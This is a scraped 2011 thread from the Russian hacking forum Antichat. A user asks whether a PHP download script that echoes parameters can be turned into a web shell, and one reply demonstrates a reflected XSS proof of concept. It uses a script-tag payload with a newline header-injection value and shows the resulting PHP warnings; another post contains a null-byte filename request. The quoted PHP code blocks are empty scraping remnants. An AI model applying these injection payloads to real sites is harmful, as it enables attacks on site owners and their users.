Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   echo в php (https://forum.antichat.xyz/showthread.php?t=308331)

jangle 14.12.2011 05:01

можно ли как то использовать как уязвимость код в php

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR

Спасибо заранее

jangle 14.12.2011 05:14

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR

А вообще интересует следующий кусок кода. При запросе

PHP код:

PHP:
[
COLOR="#000000"]http://site.com/file.php?title=123.php%00&output=[COLOR="#0000BB"][/COLOR][/COLOR] 

скачиваю файл 123.php c содержимым

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR

Как то можно это использовать. Конечная цель - веб шелл.

vernite akk= 14.12.2011 05:18

Цитата:

Сообщение от jangle
jangle said:
PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR

А вообще интересует следующий кусок кода. При запросе
PHP код:

PHP:
[
COLOR="#000000"]http://site.com/file.php?title=123.php%00&output=[COLOR="#0000BB"][/COLOR][/COLOR] 

скачиваю файл 123.php c содержимым
PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR

Как то можно это использовать. Конечная цель - веб шелл.

Врятли это както можно использовать только если xss там проскочит, а так скорее всего прав на выполнение нет..

jangle 14.12.2011 05:25

а при чем тут права? можно поподробнее? надо заставить по сути файл выполнятся вместо того что бы он скачивался.

mailbrush 14.12.2011 05:34

В этом куске кода никакой баги нет.

|qbz| 14.12.2011 05:43

XSS же пассивка.

Boolean 14.12.2011 11:21

Цитата:

Сообщение от |qbz|
|qbz| said:
XSS же пассивка.

Для того, чтобы получить XSS, нужно сорвать процесс "скачки", а для этого необходимо сорвать header(), к примеру, параметр в header не поддерживает не однострочные текста.

Код:

Code:
?output=%3Cscript%3Ealert%281%29%3C/script%3E&title=%0A

Получаем:

Код:

Code:

Warning:  Header may not contain more than a single header, new line detected. in Q:\xampp\xampp\files\echo.php on line 16

Warning:  Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in Q:\xampp\xampp\files\echo.php on line 17

Warning:  Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in Q:\xampp\xampp\files\echo.php on line 18

Warning:  Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in Q:\xampp\xampp\files\echo.php on line 20

Warning:  Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in Q:\xampp\xampp\files\echo.php on line 21

alert(1)


Rebz 15.12.2011 15:00

Описание метода есть здесь (презентация)

jangle 20.12.2011 01:29

Уважаемый Rebz

Могу ли я попросить привести пример непосредственно к коду который я выложил выше. Я долгое время пытался разобраться сам, но мой англ желает лучшего.

В итоге мы получим XSS или все таки можно будет использовать PHP?

Заранее благодарен

А за ссылку огромнейшее спасибо. Больше обрадовался что есть чему то научиться, чем возможности эксплуатации уязвимости.

И личный вопрос, если можно, ты входишь в команду ONSEC?


Время: 22:38